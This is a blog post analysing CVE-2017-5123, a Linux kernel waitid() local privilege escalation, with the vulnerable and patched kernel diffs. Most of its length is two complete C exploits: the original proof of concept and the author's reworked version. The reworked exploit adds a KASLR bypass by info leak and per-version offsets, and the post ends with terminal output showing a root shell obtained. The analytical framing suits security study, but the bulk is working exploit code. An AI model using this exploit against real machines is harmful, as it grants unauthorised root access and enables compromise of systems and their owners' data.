Linux Kernel waitid() Local Privilege Escalation posted by zer0day, 10/29/2017

tl;dr

Some days ago, i just saw this vulnerability somewhere in google. It’s about Kernel Exploitation, CVE-2017-5123. Maybe It works on 4.14.0-rc1 ~ 4.14.0-rc4 and the latest released version is 4.14.0-rc7 and stable build is 4.13.10 (2017/11/2).

The reasons for analyzing this vulnerability are ‘the payload’ and ‘the vulnerability’. Because it just triggers null dereference which is rarely seen. So, I just think that… how could it be? at the first time without seeing any information. Not only that, but it was also strange that this vulnerability exists in the latest!

1 - day vulnerability : CVE-2017-5123

Let’s see the title first :)

Linux Kernel 4.14.0-rc4+ - ‘waitid()’ Privilege Escalation

It’s an LPE(Local Privilege Escalation) using waitid().

Now, let’s see the difference of the codes and commits by version and how it works.

Before

Before Commit.

@@ -1625,15 +1625,18 @@ SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
 	if (!infop)
 		return err;
 
-	if (put_user(err ? 0 : SIGCHLD, &infop->si_signo) ||
-	    put_user(0, &infop->si_errno) ||
-	    put_user((short)info.cause, &infop->si_code) ||
-	    put_user(info.pid, &infop->si_pid) ||
-	    put_user(info.uid, &infop->si_uid) ||
-	    put_user(info.status, &infop->si_status))
-		err = -EFAULT;
-
+	user_access_begin();
+	unsafe_put_user(err ? 0 : SIGCHLD, &infop->si_signo, Efault);
+	unsafe_put_user(0, &infop->si_errno, Efault);
+	unsafe_put_user((short)info.cause, &infop->si_code, Efault);
+	unsafe_put_user(info.pid, &infop->si_pid, Efault);
+	unsafe_put_user(info.uid, &infop->si_uid, Efault);
+	unsafe_put_user(info.status, &infop->si_status, Efault);
+	user_access_end();
 	return err;
+Efault:
+	user_access_end();
+	return -EFAULT;
 }
 
 static long kernel_wait4(pid_t upid, int __user *stat_addr,
@@ -1736,13 +1739,20 @@ COMPAT_SYSCALL_DEFINE5(waitid,
 			return -EFAULT;
 	}
 
-	if (put_user(err ? 0 : SIGCHLD, &infop->si_signo) ||
-	    put_user(0, &infop->si_errno) ||
-	    put_user((short)info.cause, &infop->si_code) ||
-	    put_user(info.pid, &infop->si_pid) ||
-	    put_user(info.uid, &infop->si_uid) ||
-	    put_user(info.status, &infop->si_status))
-		err = -EFAULT;
+	if (!infop)
+		return err;
+
+	user_access_begin();
+	unsafe_put_user(err ? 0 : SIGCHLD, &infop->si_signo, Efault);
+	unsafe_put_user(0, &infop->si_errno, Efault);
+	unsafe_put_user((short)info.cause, &infop->si_code, Efault);
+	unsafe_put_user(info.pid, &infop->si_pid, Efault);
+	unsafe_put_user(info.uid, &infop->si_uid, Efault);
+	unsafe_put_user(info.status, &infop->si_status, Efault);
+	user_access_end();
 	return err;
+Efault:
+	user_access_end();
+	return -EFAULT;
 }
 #endif

This commit is from Linux Kernel v4.13.x, In the existing waitid(),

siginfo __user *

there were codes checking it whether user-land or kernel-land address. But it removed. So, by __user *, kernel-land access could be possible on user-land.

Let’s say from an exploit point of view, waitid() form what we use is

int waitid(idtype_t idtype, id_t id, siginfo_t *infop, int options);

like that. By using infop, we can write arbitrary value on arbitrary kernel-land memory and control it! I’m out of words :|

After

After Commit.

diff --git a/kernel/exit.c b/kernel/exit.c
index f2cd53e..cf28528 100644
--- a/kernel/exit.c
+++ b/kernel/exit.c
@@ -1610,6 +1610,9 @@ SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
 	if (!infop)
 		return err;
 
+	if (!access_ok(VERIFY_WRITE, infop, sizeof(*infop)))
+		goto Efault;
+
 	user_access_begin();
 	unsafe_put_user(signo, &infop->si_signo, Efault);
 	unsafe_put_user(0, &infop->si_errno, Efault);
@@ -1735,6 +1738,9 @@ COMPAT_SYSCALL_DEFINE5(waitid,
 	if (!infop)
 		return err;
 
+	if (!access_ok(VERIFY_WRITE, infop, sizeof(*infop)))
+		goto Efault;
+
 	user_access_begin();
 	unsafe_put_user(signo, &infop->si_signo, Efault);
 	unsafe_put_user(0, &infop->si_errno, Efault);

Nowadays, it just fixed like above.

Payload Analysis

Of course, by above vulnerability, we can trigger that with several various ways but let’s see ‘the orignal’ first :) payload.

#define _GNU_SOURCE
 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <string.h>
 
struct cred;
struct task_struct;
  
typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
  
prepare_kernel_cred_t   prepare_kernel_cred;
commit_creds_t    commit_creds;
  
void get_shell() {
  char *argv[] = {"/bin/sh", NULL};
  
  if (getuid() == 0){
    printf("[+] Root shell success !! :)\n");
    execve("/bin/sh", argv, NULL);
  }
  printf("[-] failed to get root shell :(\n");
}
  
void get_root() {
  if (commit_creds && prepare_kernel_cred)
    commit_creds(prepare_kernel_cred(0));
}
  
unsigned long get_kernel_sym(char *name)
{
  FILE *f;
  unsigned long addr;
  char dummy;
  char sname[256];
  int ret = 0;
  
  f = fopen("/proc/kallsyms", "r");
  if (f == NULL) {
    printf("[-] Failed to open /proc/kallsyms\n");
    exit(-1);
  }
  printf("[+] Find %s...\n", name);
  while(ret != EOF) {
    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
    if (ret == 0) {
      fscanf(f, "%s\n", sname);
      continue;
    }
    if (!strcmp(name, sname)) {
      fclose(f);
      printf("[+] Found %s at %lx\n", name, addr);
      return addr;
    }
  }
  fclose(f);
  return 0;
}
 
int main(int ac, char **av)
{
    if (ac != 2) {
        printf("./exploit kernel_offset\n");
        printf("exemple = 0xffffffff81f3f45a");
        return EXIT_FAILURE;
    }
 
    // 2 - Appel de la fonction get_kernel_sym pour rcuperer dans le /proc/kallsyms les adresses des fonctions
    prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
    commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");
    // have_canfork_callback offset <= rendre dynamique aussi
     
    pid_t     pid;
    /* siginfo_t info; */
 
    // 1 - Mapper la mmoire  l'adresse 0x0000000000000000
    printf("[+] Try to allocat 0x00000000...\n");
    if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){
        printf("[-] Failed to allocat 0x00000000\n");
        return -1;
    }
    printf("[+] Allocation success !\n");
    /* memset(0, 0xcc, 4096); */
    /*
        movq rax, 0xffffffff81f3f45a
        movq [rax], 0
        mov rax, 0x4242424242424242
        call rax
        xor rax, rax
        ret
        replace 0x4242424242424242 by get_root
    https://defuse.ca/online-x86-assembler.htm#disassembly
    */
    unsigned char shellcode[] = 
    { 0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, 0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };
    void **get_root_offset = rawmemchr(shellcode, 0x42);
    (*get_root_offset) = get_root;
 
    memcpy(0, shellcode, sizeof(shellcode));
    /* strcpy(0, "\x48\x31\xC0\xC3"); // xor rax, rax; ret */
 
    if(-1 == (pid = fork())) {
        perror("fork()");
        return EXIT_FAILURE;
    }
 
    if(pid == 0) {
        _exit(0xDEADBEEF);
        perror("son");
        return EXIT_FAILURE;
    }
 
    siginfo_t *ptr = (siginfo_t*)strtoul(av[1], (char**)0, 0);
    waitid(P_PID, pid, ptr, WEXITED | WSTOPPED | WCONTINUED);
 
    // TRIGGER
    pid = fork();
    printf("fork_ret = %d\n", pid); 
    if (pid > 0)
        get_shell();
    return EXIT_SUCCESS;
}

What ‘the maker’ said about that code, in short.

For exploitation, trigger null dereference. Overwrite have_canfork_callback (.bss seg in kernel), if have_canfork_callback is set to a value other than 0, unset callback (null) is occurred. …

But…

But… Let’s talk about my small option only about that payload, Only talk about that payload, i can say that it’s triggered, but… something is missing(?). Of course maybe, that payload was made for trigger purposes only.

Because of the testing environments. KASLR is off and mmap min address is 0 for triggering null dereference.

-nokaslr sysctl -w vm.mmap_min_addr=0

1. KASLR Bypass

Let’s talk about it first, kernel-land ASLR, KASLR is supported from linux kernel 4.4. When we boot with kaslr option, then kaslr will be applied. If not, kaslr is off. Normally we just boot the OS, then kaslr is off.

And another question is below.

    prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
    commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");

This part from the code is just getting the addresses from /proc/kallsyms. But actually, it does not work as well because if we read the address from /proc/kallsysms without root perm and kaslr, the address would be 0. In summary,

  • with nokaslr, user gets 0, root gets exact address.
  • with kaslr, can read but all time random address. (try it yourself!)

We can see that below.

zero@ubuntu:~$ uname -a
Linux ubuntu 4.13.8-041308-generic #201710180430 SMP Wed Oct 18 08:33:18 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
zero@ubuntu:~$ id
uid=1000(zero) gid=1000(zero) groups=1000(zero),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),121(lpadmin),131(sambashare)
zero@ubuntu:~$ cat /proc/kallsyms | grep prepare_kernel_cred
0000000000000000 T prepare_kernel_cred
0000000000000000 r __ksymtab_prepare_kernel_cred
0000000000000000 r __kstrtab_prepare_kernel_cred
zero@ubuntu:~$ sudo su
[sudo] password for zero: 
root@ubuntu:/home/zero# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/zero# cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff8c4a8390 T prepare_kernel_cred
ffffffff8d1ac010 r __ksymtab_prepare_kernel_cred
ffffffff8d1c6526 r __kstrtab_prepare_kernel_cred
root@ubuntu:/home/zero# cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff8c4a8390 T prepare_kernel_cred
ffffffff8d1ac010 r __ksymtab_prepare_kernel_cred
ffffffff8d1c6526 r __kstrtab_prepare_kernel_cred
root@ubuntu:/home/zero#

So, user-land with nokaslr, we can’t get exact address from /proc/kallsysms with user-perm

2. mmap_min_addr is set to 0

This value is set to 65536 by default for protecting from null dereference. (Actually mmap_min_addr is different by platform or OS whatever… ㅇㅅㅇ)

root@ubuntu:/etc/sysctl.d# cat *zeropage.conf

vm.mmap_min_addr = 65536
root@ubuntu:/etc/sysctl.d#

Then…?

It’s not related to this vulnerability, In the wild, for bypassing mitigation and exploiting fully, it’s normal that getting at least one more info leak is essential on any platforms.

That vulnerability let us give w perm on infop partially, but if there are kaslr and others, then we need to leak kernel base address or sth and other sub-works are needed as well.

Conclusion

It is interesting that this kind of vulnerability in the latest version of Linux Kernel can lead to mistakes yet ;). Anyway, it’s surprising :).

In addition 1, mmap_min_addr is set to 0, with nokaslr, known prepare_kernel_cred, commit_creds addresses already, so there could be several ways to exploit this vulnerability.

Try it Yourself :)

In addition 2, on somewhere v4.13.x when kaslr is on, we can bypass kaslr with info leak by using waitid().

Lastly, I just re-make(?) exploit-code with includding kaslr bypass :). But maybe it worked on only 4.13.0 < x <= 4.13.4 and just patched somewhere 4.13.X or 4.14.0-rcX.

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <sys/resource.h>

#include <syscall.h>

#define KASLR_BYPASS 1
#define SMEP_SMAP_BYPASS 0

struct cred;
struct task_struct;

typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon)__attribute__((regparm(3)));
typedef int(*commit_creds_t)(struct cred *new)__attribute__((regparm(3)));

unsigned long kernel_base = 0;
prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

// sudo sysctl -w vm.mmap_min_addr=0
// sudo cat /proc/kallsyms | grep _text | head -n 1

unsigned long k_offset[][4] = {
  { /* Linux Kernel 4.14.0-rc4+ info */ /* trigger! */
    0x753d0,
    0x75050,
    0xf3f45a,
  },
  { /* Linux Kernel 4.14.0-rc4 info */ /* triggered! but process is killed */
    0xaa6a0,
    0xaa310,
    0x106046c,
  },
  { /* Linux Kernel 4.13.0-16 info */ /* not triggered */
    0xa8530,    // prepare_kernel_cred
    0xa81a0,    // commit_creds
    0x105ff2c,  // have_canfork_callback
    0x1e540,    // native_read_cr4
  },
  { /* Linux Kernel 4.13.4 info */ /* trigger! but process is killed */
    0xa8340,
    0xa7fb0,
    0x105fe2c,
  },
  { /* Linux Kernel 4.13.8 info */ /* trigger! but process is killed */
    0xa8390,
    0xa8000,
    0x106042c,
  },
  { /* Linux Kernel 4.13.10 info */ /* not triggered */
    0xa8390,
    0xa8000,
    0x10603ac,
  },
};

unsigned long user_cs = 0x0;
unsigned long user_ss = 0x0;
unsigned long user_rflags = 0x0;

void backup_stat() {  
    asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "pushfq\n"
        "popq %2\n"
        : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory"
    );
}

void get_shell() { if (getuid() == 0) system("/bin/sh"); }
void get_root() { if (commit_creds && prepare_kernel_cred) commit_creds(prepare_kernel_cred(0)); }

unsigned long kaslr_bypass() {
  pid_t pid = fork();
  if (pid > 0) {
    struct rusage ru = {};
    syscall(__NR_waitid, P_PID, pid, NULL, WEXITED | WNOHANG | __WNOTHREAD, &ru);

    unsigned long *p = (unsigned long *)&ru;
    for (; p < (unsigned long *)((char *)&ru + sizeof(ru)); ++p)
      if (*p > 0xffffffff00000000 && *p < 0xffffffffff000000)
        return (*p & ~0xfffff) - 0x100000;
  }
  return 0;
}

int main(int argc, char *argv[]) {
  if (!(argc == 3 || argc == 2)) {
    printf("Usage : %s [<kernel_base_addr>] <kernel_version>\n", argv[0]);
    return EXIT_SUCCESS;
  }

  if (argc == 3) kernel_base = (unsigned long)strtoul(argv[1], (char **)0, 0);
  else if (argc == 2) kernel_base = kaslr_bypass();

  if (kernel_base == 0) {
    printf("\e[31m[-] Failed to leak kernel_base:(\n");
    return EXIT_FAILURE;
  }
  
  backup_stat(); /* backup userland env */
  
  struct utsname buf;
  if (!uname(&buf)) printf("\e[36m[*] Kernel Version \e[34m: %s\n", buf.release);
  printf("\e[35m[+] Kernel Base           \e[34m: %#llx\n", (unsigned long long)kernel_base);

  int k_ver = (int)strtoul(argv[argc - 1], (char **)0, 0);

  prepare_kernel_cred = (prepare_kernel_cred_t)(kernel_base + k_offset[k_ver][0]);
  commit_creds = (commit_creds_t)(kernel_base + k_offset[k_ver][1]);
  siginfo_t *have_canfork_callback = (siginfo_t *)(kernel_base + k_offset[k_ver][2]);

  printf("\e[35m[+] prepare_kernel_cred   \e[34m: %#llx\n", (unsigned long long)prepare_kernel_cred);
  printf("\e[35m[+] commit_creds          \e[34m: %#llx\n", (unsigned long long)commit_creds);
  printf("\e[35m[+] have_canfork_callback \e[34m: %#llx\n", (unsigned long long)have_canfork_callback);

  printf("\e[36m[*] Stage 1 - Try to allocate 0x0\n");
  if (mmap((void *)0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0) == (char *)-1) {
    printf("\e[31m[-] Failed to allocate 0x0\n");
    return EXIT_FAILURE;
  }

  printf("\e[36m[*] Stage 2 - Inject shellcode\n");
  
  unsigned char shellcode[] = {
      /* insert 0 into have_canfork_callback */
      0x48, 0xB8,
      0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, // mov rax, have_canfork_callback
      0x48, 0xC7,
      0x00, 0x00, 0x00, 0x00, 0x00,                   // mov [rax], 0x0
      /* SMEP/SMAP Bypass */
      // 0x68,
      // 0xf0, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // push 0x00000000000006f0
      // 0x5f, 0xc3,                                     // pop rdi; ret;
      // 0x0f, 0x22, 0xe7, 0xc3,                         // mov cr4, rdi; ret;
      /* call get_root() */
      0x48, 0xB8,
      0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, // mov rax, &get_root()
      0xFF, 0xD0, 0x48,                               // call rax
      /* userland info */
      // 0x0f, 0x01, 0xf8, 0xc3                       // swapgs; ret;
      // 0x48, 0xcf                                   // iretq;
      // rip = get_shell
      // cs = user_cs
      // rflags = user_rflags
      // rsp = asm('rsp')
      // ss = user_ss
      /* jmp to nullptr */
      0x31, 0xC0, 0xC3,                               // xor rax, rax; ret;
  };

  void **offset = 0;
  
  offset = rawmemchr(shellcode, 0x41);
  (*offset) = have_canfork_callback;

  offset = rawmemchr(shellcode, 0x42);
  (*offset) = get_root;

  memcpy((void *)0, shellcode, sizeof(shellcode));

  pid_t pid;
  if ((pid = fork()) == -1) return EXIT_FAILURE;
  if (pid == 0) return EXIT_FAILURE;

  printf("\e[36m[*] Stage 3 - Trigger waitid()\n");
  if (waitid(P_PID, pid, have_canfork_callback, WEXITED | WSTOPPED | WCONTINUED) == -1) {
    perror("waitpid()");
    return EXIT_FAILURE;
  }

  pid = fork(); // Trigger

  if (pid > 0) get_shell();
  return EXIT_SUCCESS;
}
/ $ id
uid=1001(zero) gid=1001(zero) groups=1001(zero)
/ $ ./exp 0xffffffff81000000 0
[*] Kernel Version : 4.14.0-rc4+
[+] Kernel Base           : 0xffffffff81000000
[+] prepare_kernel_cred   : 0xffffffff810753d0
[+] commit_creds          : 0xffffffff81075050
[+] have_canfork_callback : 0xffffffff81f3f45a
[*] Stage 1 - Try to allocate 0x0
[*] Stage 2 - Inject shellcode
[*] Stage 3 - Trigger waitid()
/ # id
uid=0(root) gid=0(root)

[+] Plus

zero@ubuntu:~/Desktop/kaslr_bypass$ ./exp 0
[*] Kernel Version : 4.13.4-041304-generic
[+] Kernel Base           : 0xffffffffa0a00000
...
zero@ubuntu:~/Desktop/kaslr_bypass$ sudo cat /proc/kallsyms | grep _text | head -n 1
ffffffffa0a00000 T _text

End